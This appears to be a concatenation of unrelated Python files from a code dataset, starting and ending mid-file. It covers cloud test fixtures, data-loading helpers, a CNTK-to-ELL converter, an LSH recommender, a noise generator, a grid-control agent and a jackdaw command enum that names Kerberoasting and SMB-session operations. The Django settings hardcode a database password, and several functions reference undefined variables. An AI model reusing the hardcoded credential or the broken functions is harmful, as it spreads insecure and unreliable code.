Create a volume\n volume = cls.compute_integration.volumes.behaviors.\\\n create_available_volume(\n cls.compute_integration.volumes.config.\n default_volume_type_min_size,\n cls.compute_integration.volumes.config.default_volume_type,\n rand_name('live_migrate_volume'))\n cls.resources.add(volume.id_, cls.delete_volume)\n cls.compute_integration.volume_attachments.behaviors.\\\n attach_volume_to_server(cls.server.id, volume.id_)\n cls.attached_volumes.append(volume)\n\n # Migrate and wait for ACTIVE status\n compute_admin = ComputeAdminComposite()\n compute_admin.servers.client.migrate_server(cls.server.id)\n compute_admin.servers.behaviors.wait_for_server_status(\n cls.server.id, NovaServerStatusTypes.VERIFY_RESIZE)\n compute_admin.servers.client.confirm_resize(cls.server.id)\n compute_admin.servers.behaviors.wait_for_server_status(\n cls.server.id, NovaServerStatusTypes.ACTIVE)\n # Allow the server additional time to complete the migration processes\n # prior to performing tests\n time.sleep(30)\n\n @classmethod\n def confirm_server_deleted(cls, server_id):\n \"\"\" Confirm the server resource has been deleted\n\n This method will attempt to confirm the server resource created\n during setup has been deleted. If confirmation fails or times out,\n the id of the server will be logged.\n\n Args:\n server_id: The id of the server that would have been deleted.\n\n Returns:\n None\n \"\"\"\n try:\n cls.compute.servers.behaviors.\\\n confirm_server_deletion(server_id=server_id,\n response_code=404)\n except Exception as e:\n cls.fixture_log.log(logging.WARNING, str(e))\n\n @classmethod\n def delete_volume(cls, volume_id):\n \"\"\" Delete the volumes created during setup\n\n This method will attempt to detach and delete all volumes created\n and attached during setup. If a either detaching or deleting fails\n or times out without being confirmed, the id of the volume will be\n logged.\n\n Args:\n volume_id: The id of the volume being deleted\n\n Returns:\n None\n \"\"\"\n\n if volume_id in [volume.id_ for volume in cls.attached_volumes]:\n try:\n cls.compute_integration.volume_attachments.behaviors.\\\n delete_volume_attachment(volume_id, cls.server.id)\n except Exception as e:\n cls.fixture_log.log(logging.WARNING, str(e))\n\n if not cls.compute_integration.volumes.behaviors.\\\n delete_volume_confirmed(volume_id):\n cls.fixture_log.log(logging.WARNING,\n \"Volume {0} either was not deleted during \"\n \"clean up procedures or the confirm \"\n \"deletion operation timed out.\".\n format(volume_id))\n\n @tags(type='smoke', net='yes')\n def test_server_volumes_attached(self):\n \"\"\" Test that a servers attached volumes have the status of \"in-use\"\n\n Get the details of the volumes created and attached during the\n setup. Validate that the status of the volume is 'in-use'.\n\n The following assertions occur:\n - The status of all of the volumes created and attached\n during setup have a status of 'in-use'\n \"\"\"\n volumes_not_attached = list()\n for volume in self.attached_volumes:\n volume_after_migration = self.compute_integration.volumes.\\\n behaviors.get_volume_info(volume.id_)\n if volume_after_migration.status != volume_statuses.Volume.IN_USE:\n volumes_not_attached.append(volume_after_migration)\n\n self.assertEqual(len(volumes_not_attached), 0,\n msg=\"One or more volume attachments were not \"\n \"attached to the server with id {0}. Unattached \"\n \"Volumes: {1}\".format(\n self.server.id, volumes_not_attached))\n","sub_path":"cloudroast/compute/integration/volumes/boot_from_volume/admin_api/v2/test_migrate_server_with_attachments.py","file_name":"test_migrate_server_with_attachments.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184650295","text":" \n\ndef __print_chiptableX(hs_tables):\n #print(hs_tables.execstr('hs_tables'))\n #exec(hs_tables.execstr('hs_tables'))\n cx2_gx = hs_tables.cx2_gx\n cx2_cid = hs_tables.cx2_cid\n cx2_nx = hs_tables.cx2_nx\n cx2_theta = hs_tables.cx2_theta\n cx2_roi = hs_tables.cx2_roi\n #prop_names = ','.join(px2_propname)\n print('=======================================================')\n print('# Begin ChipTableX')\n print('# ChipID, NameX, ImgX, roi[tl_x tl_y w h], theta')\n chip_iter = iter(zip(cx2_cid, cx2_nx, cx2_gx, cx2_roi, cx2_theta))\n for (cid, nx, gx, roi, theta) in chip_iter:\n print('%8d, %5d, %5d, %25s, %6.3f' % (cid, nx, gx, str(roi).replace(',',''), theta))\n print('# End ChipTableX')\n print('=======================================================')\n\ndef print_chiptable(hs_tables):\n #exec(hs_tables.execstr('hs_tables'))\n #print(hs_tables.execstr('hs_tables'))\n #prop_names = ','.join(px2_propname)\n print('=======================================================')\n print('# Begin ChipTable')\n # Get length of the max vals for formating\n cx2_cid = hs_tables.cx2_cid\n cx2_theta = hs_tables.cx2_theta\n cx2_gname = [hs_tables.gx2_gname[gx] for gx in hs_tables.cx2_gx]\n cx2_name = [hs_tables.nx2_name[nx] for nx in hs_tables.cx2_nx]\n cx2_stroi = [str(roi).replace(',','') for roi in hs_tables.cx2_roi]\n max_gname = max([len(gname) for gname in iter( cx2_gname)])\n max_name = max([len(name) for name in iter( cx2_name) ])\n max_stroi = max([len(stroi) for stroi in iter( cx2_stroi)])\n _mxG = str(max([max_gname+1, 5]))\n _mxN = str(max([max_name+1, 4]))\n _mxR = str(max([max_stroi+1, 21]))\n\n fmt_str = '%8d, %'+_mxN+'s, %'+_mxG+'s, %'+_mxR+'s, %6.3f'\n\n c_head = '# ChipID'\n n_head = ('%'+_mxN+'s') % 'Name'\n g_head = ('%'+_mxG+'s') % 'Image'\n r_head = ('%'+_mxR+'s') % 'roi[tl_x tl_y w h]'\n t_head = ' theta'\n header = ', '.join([c_head,n_head,g_head,r_head,t_head])\n print(header)\n\n # Build the table\n chip_iter = iter(zip( cx2_cid, cx2_name, cx2_gname, cx2_stroi, cx2_theta))\n for (cid, name, gname, stroi, theta) in chip_iter:\n _roi = str(roi).replace(',',' ') \n print(fmt_str % (cid, name, gname, stroi, theta))\n\n print('# End ChipTable')\n print('=======================================================')\n\n\n@helpers.unit_test\ndef test_load_csv():\n db_dir = params.DEFAULT\n hs_dirs, hs_tables = load_csv_tables(db_dir)\n print_chiptable(hs_tables)\n __print_chiptableX(hs_tables)\n print(hs_tables.nx2_name)\n print(hs_tables.gx2_gname)\n hs_tables.printme2(val_bit=True, max_valstr=10)\n return hs_dirs, hs_tables\n\n\n@helpers.__DEPRICATED__\ndef get_sv_test_data(qcx=0, cx=None):\n return get_test_data(qcx, cx)\n\n","sub_path":"_graveyard/load_data_graveyard.py","file_name":"load_data_graveyard.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533738997","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom lib import encode_rle\n\ndef create_dataset(path):\n '''Create dataset with names of images and code of their masks.\n\n Parameters\n ----------\n path: str\n Path to data with images.\n \n Return\n ----------\n data_df: DataFrame object (pandas.core.frame.DataFrame)\n \n '''\n masks_d = []\n masks = os.listdir(path+'_mask')\n for i in masks:\n img,mask = i[:-4]+'.jpg', np.array(Image.open(path+'_mask/'+i))\n masks_d.append([img,encode_rle(mask)])\n return pd.DataFrame(masks_d)\n\n\n\ndef from_image_to_array(data):\n '''\n \n PARAMETRS\n ----------\n data: pd.DataFrame\n Original data (test, valid images)\n model: model\n \n RETURN\n ---------\n names: str\n img: np.array\n '''\n \n arrays = []\n\n for i in data.sort_values(0).iloc[:,0].values:\n names.append(i)\n img = cv2.imread(path+i)\n img = cv2.resize(img, (256,256))\n arrays.append(img)\n img = np.array(arrays)/ 255.\n \n return names, img","sub_path":"human_segmentation/functions/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165834892","text":"from .defaults import * # noqa\nfrom .utils import parse_database_url\n\nLEVEL = 'development'\n\nDATABASE_URL = (\n 'postgres://betterbeauty:W8zSrpqUkFzReUqT@127.0.0.1:5432/betterbeauty'\n)\n\n# Setup default database connection from Database URL\nDATABASES = {\n 'default': parse_database_url(DATABASE_URL),\n}\n\nDEBUG = True\n\nFB_APP_ID = ''\nFB_APP_SECRET = ''\n","sub_path":"webapp/betterbeauty/core/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83353425","text":"# programa que lê um nome de usuário e a sua senha e não aceita a senha igual ao nome do usuário,\n# mostrando uma mensagem de erro e voltando a pedir as informações\n\n\nusuario = input('Digite o nome de usuario: ')\nsenha = input('Digite a senha: ')\n\n\nwhile (senha == usuario):\n print('\\nERROR: usuario e senha nao podem ser iguais!\\n')\n usuario = input('digite o nome de usuario: ')\n senha = input('digite a senha: ')\n\nif (senha != usuario):\n print('\\n#########################')\n print('Conta Criada Com Sucesso\\n')\n print('SEU LOGIN É: ', usuario, '\\nSUA SENHA É: ', senha)\n","sub_path":"questao0.py","file_name":"questao0.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118446263","text":"'''\nCreated on Jan 21, 2015\n\n@author: hijungshin\n'''\n\nfrom figure import Figure\nimport sys\nimport cv2\nimport util\nfrom visualobjects import VisualObject\nimport numpy as np\nfrom writehtml import WriteHtml\n\nif __name__ == \"__main__\":\n objdir = sys.argv[1]\n list_of_objs = VisualObject.objs_from_file(\"None\", objdir)\n \n linetxt = sys.argv[2]\n line_ids = util.stringlist_from_txt(linetxt)\n line_ids = util.strings2ints(line_ids)\n \n panorama = sys.argv[3]\n \n n_figures = len(np.unique(np.array(line_ids)))\n figuredir = objdir + \"/figure_test\"\n list_of_figures = Figure.getfigures(list_of_objs, line_ids, figuredir)\n \n html = WriteHtml(objdir + \"/figures_test.html\", \"Figures\")\n html.figure(panorama, width=\"800\", caption=\"panorama view\")\n html.opentable(border = 1)\n for i in range(0, n_figures):\n html.opentablerow()\n figure_i = []\n for fig in list_of_figures:\n if fig.main_id == i:\n figure_i.append(fig)\n \n j = 0\n for fig in figure_i:\n html.opentablecell()\n html.figure(fig.newobjpath, width=\"300\", caption=\"Figure%i-%i\"%(i, j))\n j += 1\n html.closetablecell()\n html.closetablecell()\n html.closetable()\n html.closehtml()\n ","sub_path":"Scripts/annotation_test.py","file_name":"annotation_test.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"376362406","text":"# 이것이 취업을 위한 코딩테스트다 p.226\n# 효율적인 화폐 구성\n\nn,m = map(int, input().split())\n\narr = []\nfor i in range(n) : arr.append(int(input()))\n\nd = [10001]*(m+1)\n\nd[0] = 0\nfor i in range(n) : \n for j in range(arr[i],m+1) : \n if d[j-arr[i]] != 10001 : \n d[j] = min(d[j], d[j-arr[i]]+1)\nif d[m] == 10001 : \n print(-1)\nelse : print(d[m])","sub_path":"DP/효율적인화폐구성.py","file_name":"효율적인화폐구성.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"264265728","text":"import enum\n\nclass NestOpCmd(enum.Enum):\n\tGATHER = 'GATHER'\n\tKERBEROAST = 'KERBEROAST'\n\tSMBSESSIONS = 'SMBSESSIONS'\n\tPATHSHORTEST = 'PATHSHORTEST'\n\tPATHDA = 'PATHDA'\n\tGETOBJINFO = 'GETOBJINFO'\n\tCHANGEAD = 'CHANGEAD'\n\tLISTADS = 'LISTADS'\n\tOK = 'OK'\n\tERR = 'ERR'\n\tLOG = 'LOG'\n\tLISTGRAPHS = 'LISTGRAPHS'\n\tCHANGEGRAPH = 'CHANGEGRAPH'\n\tTCPSCAN = 'TCPSCAN'\n\tTCPSCANRES = 'TCPSCANRES'\n\tLISTADSRES = 'LISTADSRES'\n\tPATHRES = 'PATHRES'\n\tGATHERSTATUS = 'GATHERSTATUS'\n\tUSERRES = 'USERRES'\n\tCOMPUTERRES = 'COMPUTERRES'\n\tSMBSESSIONRES = 'SMBSESSIONRES'\n\tSMBSHARERES\t= 'SMBSHARERES'\n\tSMBLOCALGROUPRES = 'SMBLOCALGROUPRES'\n\tLOADAD = 'LOADAD'\n\tGROUPRES = 'GROUPRES'\n\t\n\n","sub_path":"jackdaw/nest/ws/protocol/cmdtypes.py","file_name":"cmdtypes.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"18422025","text":"import sys\nfrom itertools import combinations\nfrom pyspark.sql import SparkSession\nfrom itertools import combinations\nimport operator\nimport csv\n\ndef min_hash(values):\n sign = []\n for i in range(1, 51):\n hash_list = []\n for v in values:\n h_value = (3*v + 11*i) % 100\n hash_list.append(h_value)\n sign.append(min(hash_list))\n return sign\n\ndef band(item):\n band = []\n for i in range(0, 10):\n band.append((i, (item[0], item[1][i])))\n return band\n\ndef candidate(input):\n result = []\n permutations = list(combinations(input, 2))\n for each in permutations:\n u1 = each[0]\n u2 = each[1]\n if operator.eq(u1[1],u2[1]):\n candi = tuple([u1[0], u2[0]])\n reverse_candi = tuple([u2[0], u1[0]])\n result.append(candi)\n result.append(reverse_candi)\n return result\n\ndef top3_user(item):\n m1 = users_dict[item[0]]\n simi_dict = {}\n top3 = []\n for each in item[1]:\n m2 = users_dict[each]\n inter = set(m1).intersection(set(m2))\n union = set(m1).union(set(m1))\n simi = float(len(inter)/len(union))\n simi_dict[simi]=each\n l = sorted(simi_dict.keys())[0:3]\n for each in l:\n top3.append(simi_dict[each])\n return (item[0], top3)\n\ndef rating_dict(values):\n d = {}\n for each in values:\n d[each[0]]=each[1]\n return d\ndef predict_movies(item):\n u1 = ratings_dict[item[0]].keys()\n pred_movies = []\n for each in item[1]:\n u2 = ratings_dict[each].keys()\n diff = set(u2).difference(set(u1))\n pred_movies.extend(list(diff))\n pred_movies = list(set(pred_movies))\n pred_ratings = {}\n for i in pred_movies:\n pred_ratings[i] = []\n for each in item[1]:\n if i in ratings_dict[each].keys():\n pred_ratings[i].append(ratings_dict[each][i])\n else:\n continue\n return (int(item[0]), pred_ratings)\ndef average_rating(values):\n for each in values:\n values[each] = float(sum(values[each])/len(values[each]))\n values = sorted(values.items(),key=lambda item:item[0])\n return values\nif __name__ == \"__main__\":\n\t\n spark = SparkSession \\\n .builder \\\n .appName(\"LSH\") \\\n .getOrCreate()\n sc = spark.sparkContext\n\n lines = sc.textFile(sys.argv[1])\n header = lines.first()\n data = lines.filter(lambda x: x != header).map(lambda x: x.split(',')).collect()\n rdd = sc.parallelize(data)\n baskets = rdd.filter(lambda x: x != header) \\\n .map(lambda x: (x[0],int(x[1]))) \\\n .groupByKey()\\\n .map(lambda x: (x[0],list(x[1]))).collect()\n signiture = sc.parallelize(baskets).mapValues(lambda values: min_hash(values))\n signiture = signiture.mapValues(lambda values: [values[i:i+5] for i in range(0, 50, 5)]).collect()\n\n bands = sc.parallelize(signiture).flatMap(lambda x: band(x)).groupByKey().map(lambda x:(x[0], list(x[1]))).collect()\n\n users_dict = {}\n for each in baskets:\n users_dict[each[0]]=each[1]\n\n\n candidates = sc.parallelize(bands).mapValues(lambda values: candidate(values)).flatMap(lambda x: x[1]).distinct().groupByKey().map(lambda x: (x[0], list(x[1]))).collect()\n top3_simi = sc.parallelize(candidates).map(lambda x: top3_user(x)).collect()\n ratings = rdd.map(lambda x: (x[0],(int(x[1]), float(x[2])))) \\\n .groupByKey()\\\n .map(lambda x: (x[0],list(x[1]))).mapValues(lambda v: rating_dict(v)).collect()\n\n ratings_dict = {}\n for each in ratings:\n ratings_dict[each[0]]=each[1]\n\n predicting = sc.parallelize(top3_simi).map(lambda x: predict_movies(x)).mapValues(lambda x : average_rating(x)).sortByKey().collect()\n\n\n f = open(sys.argv[2], 'w')\n csv_writer = csv.writer(f)\n csv_writer.writerow(['user', 'movie', 'rating'])\n for i in range(len(predicting)):\n for each in predicting[i][1]:\n csv_writer.writerow([predicting[i][0], each[0], each[1]])\n f.close()\n","sub_path":"lsh.py","file_name":"lsh.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"55839843","text":"import numpy as np\nfrom math import sin, cos, pi, sqrt, ceil, floor, log\n\ndef build_landscape(width, height, octaves=6, scaling=1.8, seed=-1):\n landscape = np.zeros((width, height))\n\n # octaves limited if grid is too small\n octaves = min(floor(log(min(width, height), scaling))-1, octaves)\n print(octaves)\n scale = min(width, height) # scale = size of features\n amplitude = 1\n for octave in range(octaves):\n # octave_intensity = noise_2d(width, height, width, height, seed=seed) * amplitude\n # amplitude = noise_2d(width, height, width, height, seed=seed)\n amplitude = 0.6 ** octave\n landscape = landscape * (1 - amplitude) + noise_2d(width, height, scale, scale, seed=seed) * amplitude\n scale /= scaling\n return landscape\n \ndef noise_2d(width, height, period_width, period_height, seed=-1):\n # ensure everything is an integer\n width //= 1\n height //=1\n period_width //=1\n period_height //=1\n\n # set the seed if one is set\n if seed != -1:\n np.random.seed(seed)\n\n coarse_i_count = ceil(width / period_width)\n coarse_j_count = ceil(height / period_height)\n\n # The 2D course-grid matrix of random unit vectors, which defines the grid, with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], with subarray [vector-x, vector-y]\n coarse_grid = np.random.rand(coarse_i_count + 1, coarse_j_count + 1) * 2 * pi\n coarse_grid = np.array([[coarse_grid[:-1, :-1], coarse_grid[1:, :-1]],\n [coarse_grid[:-1, 1: ], coarse_grid[1:, 1: ]]])\n coarse_grid = np.array([np.cos(coarse_grid), np.sin(coarse_grid)]).transpose(3, 4, 2, 1, 0)\n # generate fine grid by repeating coarse grid to fill space\n fine_coarse_grid = np.repeat(np.repeat(coarse_grid, period_width, axis=0), period_height, axis=1)\n\n # create a left-to-right gradient in fine grid dimensions\n h_step = 1/period_width\n v_step = 1/period_height\n fine_grid_gradient_up, fine_grid_gradient_left = np.mgrid[1-h_step/2 : 0 : -h_step, 1-v_step/2 : 0 : -v_step]\n\n # The 2D fine-grid weighting matrix for interpolation, with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], and vector subarray [vector-x, vector-y] (vector-x = vector-y)\n weighting_fine_grid = fine_grid_gradient_left * fine_grid_gradient_up\n weighting_fine_grid = np.array([\n [\n [weighting_fine_grid[: , :], weighting_fine_grid[: , ::-1]], # upper-left and upper-right weightings\n [weighting_fine_grid[::-1, :], weighting_fine_grid[::-1, ::-1]] # lower-left and lower-right weightings\n ],] * 2\n ).transpose(3, 4, 1, 2, 0)\n weighting_fine_grid = 3*weighting_fine_grid**2 - 2*weighting_fine_grid**3\n weighting_fine_grid_tiled = np.tile(weighting_fine_grid, (coarse_i_count, coarse_j_count, 1, 1, 1))\n\n # The 2D fine-grid vectors matrix for determining height (by multiplying vs. coarse-grid vectors), with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], and vector subarray [vector-x, vector-y]\n vectors_fine_grid = np.array( \n [[[-fine_grid_gradient_left[:, ::-1], -fine_grid_gradient_up[::-1, :]], # upper-left\n [ fine_grid_gradient_left[:, : ], -fine_grid_gradient_up[::-1, :]]], # upper-right\n [[-fine_grid_gradient_left[:, ::-1], fine_grid_gradient_up[: , :]], # lower-left\n [ fine_grid_gradient_left[:, : ], fine_grid_gradient_up[: , :]]]] # lower-right\n ).transpose(3, 4, 0, 1, 2)\n vectors_fine_grid_tiled = np.tile(vectors_fine_grid, (coarse_i_count, coarse_j_count, 1, 1, 1))\n fine_grid = fine_coarse_grid * vectors_fine_grid_tiled * weighting_fine_grid_tiled\n\n # add multiplied vector-x + multiplied vector-y to get dot product\n fine_grid = fine_grid.transpose(4, 0, 1, 2, 3)\n fine_grid = fine_grid[0] + fine_grid[1]\n\n fine_grid = fine_grid.transpose(2, 3, 0, 1)\n fine_grid = fine_grid[0,0] + fine_grid[1,0] + fine_grid[0,1] + fine_grid[1,1] \n\n return fine_grid[:width, :height] + 0.5\n\n\n# landscape = noise_2d(200,200,100,100)\n# landscape = build_landscape(200, 200, octaves=8)\n# np.savetxt('test.txt', landscape)","sub_path":"fractal_landscape.py","file_name":"fractal_landscape.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"583420006","text":"import pypownet.agent\nimport pypownet.environment\nimport numpy as np\nimport os\n\nclass Submission(pypownet.agent.Agent):\n \"\"\"\n An example of a baseline controler that randomly switches the status of one random power line per timestep (if the\n random line is previously online, switch it off, otherwise switch it on).\n \"\"\"\n\n def __init__(self, environment):\n super().__init__(environment)\n self.verbose = True\n\n def chooseAction(self, template, rewardRef):\n if 0 in template:\n actions = []\n for i in range(len(template)):\n test = template.copy()\n if test[i] != 1:\n test[i] = 1\n actions.append(test)\n rewards = []\n for act in actions:\n act = self.environment.action_space.array_to_action(act)\n rewards.append(sum(self.environment.simulate(act, do_sum = False)))\n rewards = np.asarray(rewards)\n best_index = np.argmax(rewards)\n if rewards[best_index] > rewardRef:\n return actions[best_index]\n return template\n\n def act(self, observation):\n # Sanity check: an observation is a structured object defined in the environment file.\n assert isinstance(observation, pypownet.environment.Observation)\n action_space = self.environment.action_space\n\n # Create template of action with no switch activated (do-nothing action)\n bestAction = np.zeros(action_space.action_length)\n stop = 1\n cpt = 0\n while(True):\n rew = sum(self.environment.simulate(action_space.array_to_action(bestAction), do_sum = False))\n newBestAction = self.chooseAction(bestAction,rew)\n if (np.array_equal(newBestAction,bestAction)):\n break\n bestAction = newBestAction\n cpt = cpt+1\n if cpt == stop:\n break\n reward_aslist = self.environment.simulate(action_space.array_to_action(bestAction), do_sum=False)\n reward = sum(reward_aslist)\n if self.verbose:\n print('reward: [', ', '.join(['%.2f' % c for c in reward_aslist]), '] =', reward)\n return action_space.array_to_action(bestAction)\n","sub_path":"starting_kit/example_submission/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"651479960","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom enum import Enum\nfrom azure.core import CaseInsensitiveEnumMeta\n\n\nclass AzureBareMetalHardwareTypeNamesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Name of the hardware type (vendor and/or their product name).\"\"\"\n\n CISCO_UCS = \"Cisco_UCS\"\n HPE = \"HPE\"\n\n\nclass AzureBareMetalInstancePowerStateEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Resource power state.\"\"\"\n\n STARTING = \"starting\"\n STARTED = \"started\"\n STOPPING = \"stopping\"\n STOPPED = \"stopped\"\n RESTARTING = \"restarting\"\n UNKNOWN = \"unknown\"\n\n\nclass AzureBareMetalInstanceSizeNamesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Specifies the AzureBareMetal instance SKU.\"\"\"\n\n S72_M = \"S72m\"\n S144_M = \"S144m\"\n S72 = \"S72\"\n S144 = \"S144\"\n S192 = \"S192\"\n S192_M = \"S192m\"\n S192_XM = \"S192xm\"\n S96 = \"S96\"\n S112 = \"S112\"\n S224 = \"S224\"\n S224_M = \"S224m\"\n S224_OM = \"S224om\"\n S224_OO = \"S224oo\"\n S224_OOM = \"S224oom\"\n S224_OOO = \"S224ooo\"\n S384 = \"S384\"\n S384_M = \"S384m\"\n S384_XM = \"S384xm\"\n S384_XXM = \"S384xxm\"\n S448 = \"S448\"\n S448_M = \"S448m\"\n S448_OM = \"S448om\"\n S448_OO = \"S448oo\"\n S448_OOM = \"S448oom\"\n S448_OOO = \"S448ooo\"\n S576_M = \"S576m\"\n S576_XM = \"S576xm\"\n S672 = \"S672\"\n S672_M = \"S672m\"\n S672_OM = \"S672om\"\n S672_OO = \"S672oo\"\n S672_OOM = \"S672oom\"\n S672_OOO = \"S672ooo\"\n S768 = \"S768\"\n S768_M = \"S768m\"\n S768_XM = \"S768xm\"\n S896 = \"S896\"\n S896_M = \"S896m\"\n S896_OM = \"S896om\"\n S896_OO = \"S896oo\"\n S896_OOM = \"S896oom\"\n S896_OOO = \"S896ooo\"\n S960_M = \"S960m\"\n\n\nclass AzureBareMetalProvisioningStatesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"State of provisioning of the AzureBareMetalInstance.\"\"\"\n\n ACCEPTED = \"Accepted\"\n CREATING = \"Creating\"\n UPDATING = \"Updating\"\n FAILED = \"Failed\"\n SUCCEEDED = \"Succeeded\"\n DELETING = \"Deleting\"\n MIGRATING = \"Migrating\"\n\n\nclass CreatedByType(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"The type of identity that created the resource.\"\"\"\n\n USER = \"User\"\n APPLICATION = \"Application\"\n MANAGED_IDENTITY = \"ManagedIdentity\"\n KEY = \"Key\"\n","sub_path":"sdk/baremetalinfrastructure/azure-mgmt-baremetalinfrastructure/azure/mgmt/baremetalinfrastructure/models/_bare_metal_infrastructure_client_enums.py","file_name":"_bare_metal_infrastructure_client_enums.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295359637","text":"####################################################################################################\n#\n# Project: Embedded Learning Library (ELL)\n# File: cntk_converters.py (importers)\n# Authors: Byron Changuion\n#\n# Requires: Python 3.x, cntk-2.0-cp35\n#\n####################################################################################################\n\n\"\"\"Converts CNTK data structures to ELL equivalents\"\"\"\n\nimport ell\nimport numpy as np\n\ndef get_float_vector_from_constant(constant, size):\n # Workaround: For some reason, np.full is not returning a type that SWIG can parse. So just manually walk the array setting the scalar\n array = np.zeros(size, dtype=np.float)\n for i in range(array.size):\n array[i] = constant\n return ell.math.FloatVector(array)\n\n\ndef get_float_vector_from_cntk_trainable_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatVector from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n\n orderedWeights = np.zeros(tensorValue.size, dtype=np.float)\n i = 0\n for columnValue in tensorValue:\n orderedWeights[i] = columnValue\n i += 1\n\n return ell.math.FloatVector(orderedWeights)\n\n\ndef get_float_vector_from_cntk_array(inputArray):\n \"\"\"Returns an ell.math.FloatTensor from a 4, 3, 2, or 1 dimensional numpy array.\n CNTK has input in filter/parallel, channel, row, column order while\n ELL's ordering is row, column, channel.\n \"\"\"\n tensorShape = inputArray.shape\n orderedWeights = np.zeros(inputArray.size, dtype=np.float)\n if (len(tensorShape) == 4):\n i = 0\n for filter in range(tensorShape[0]):\n for row in range(tensorShape[2]):\n for column in range(tensorShape[3]):\n for channel in range(tensorShape[1]):\n orderedWeights[i] = inputArray[filter][channel][row][column]\n i += 1\n # Reshape to (filters * rows, columns, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[0] * tensorShape[2], tensorShape[3], tensorShape[1])\n elif (len(tensorShape) == 3):\n i = 0\n for row in range(tensorShape[1]):\n for column in range(tensorShape[2]):\n for channel in range(tensorShape[0]):\n orderedWeights[i] = inputArray[channel][row][column]\n i += 1\n # Reshape to (rows, columns, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n i = 0\n for row in range(tensorShape[1]):\n for column in range(tensorShape[0]):\n orderedWeights[i] = inputArray[column][row]\n i += 1\n # Reshape to (rows, 1, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[1], 1, tensorShape[0])\n elif (len(tensorShape) == 1):\n i = 0\n for columnValue in inputArray:\n orderedWeights[i] = columnValue\n i += 1\n # Reshape to (1, 1, channels)\n orderedWeights = orderedWeights.reshape(1, 1, inputArray.size)\n else:\n print(\"Error: Input array has incorrect dimensions\")\n return None\n\n return np.ravel(orderedWeights)\n\n\ndef get_float_tensor_from_cntk_dense_weight_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n CNTK has them in channel, row, column, filter order.\n 4D parameters are converted to ELL Tensor by stacking vertically in the row dimension.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n\n # orderedWeights = tensorValue\n if (len(tensorShape) == 4):\n orderedWeights = tensorValue\n orderedWeights = np.moveaxis(orderedWeights, 0, -1)\n orderedWeights = np.moveaxis(orderedWeights, 2, 0)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[3] * tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 3):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(\n np.float).reshape(tensorShape[1], 1, tensorShape[0])\n else:\n orderedWeights = tensorValue.ravel().astype(\n np.float).reshape(1, 1, tensorValue.size)\n\n return ell.math.FloatTensor(orderedWeights)\n\n\ndef get_float_tensor_from_cntk_convolutional_weight_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n 4D parameters (e.g. those that represent convolutional weights) are stacked vertically in the row dimension.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n return get_float_tensor_from_cntk_convolutional_weight_value_shape(tensorParameter.value, tensorParameter.shape)\n\n\ndef 